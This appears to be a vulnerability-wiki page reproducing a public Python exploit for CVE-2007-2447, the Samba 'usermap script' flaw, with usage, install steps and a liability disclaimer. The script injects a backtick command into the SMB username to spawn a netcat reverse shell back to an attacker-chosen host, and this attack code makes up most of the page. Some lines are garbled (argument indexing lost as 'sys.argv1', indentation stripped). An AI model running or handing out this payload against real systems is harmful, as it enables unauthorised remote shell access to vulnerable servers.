免费、自由、人人可编辑的漏洞库
,
INFO
CVE-2007-2447
====
CVE-2007-2447 - Samba usermap script.
</br>
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
## Usage:
```shell
$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
```
* `RHOST` -- The target address
* `RPORT` -- The target port (TCP : 139)
* `LHOST` -- The listen address
* `LPORT` -- The listen port
## Installation
sudo apt install python python-pip
pip install --user pysmb
git clone https://github.com/amriunix/CVE-2007-2447.git
### Disclaimer:
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.
usermap_sctipt.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
import sys
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
username = "/=`nohup " + payload + "`"
conn = SMBConnection(username, "", "", "")
try:
conn.connect(rhost, int(rport), timeout=1)
except:
print("+ Payload was sent - check netcat !")
if __name__ == '__main__':
print("* CVE-2007-2447 - Samba usermap script")
if len(sys.argv) != 5:
print("- usage: python " + sys.argv0 + " <RHOST> <RPORT> <LHOST> <LPORT>")
else:
print("+ Connecting !")
rhost = sys.argv1
rport = sys.argv2
lhost = sys.argv3
lport = sys.argv4
exploit(rhost, rport, lhost, lport)
PWNWIK.COM
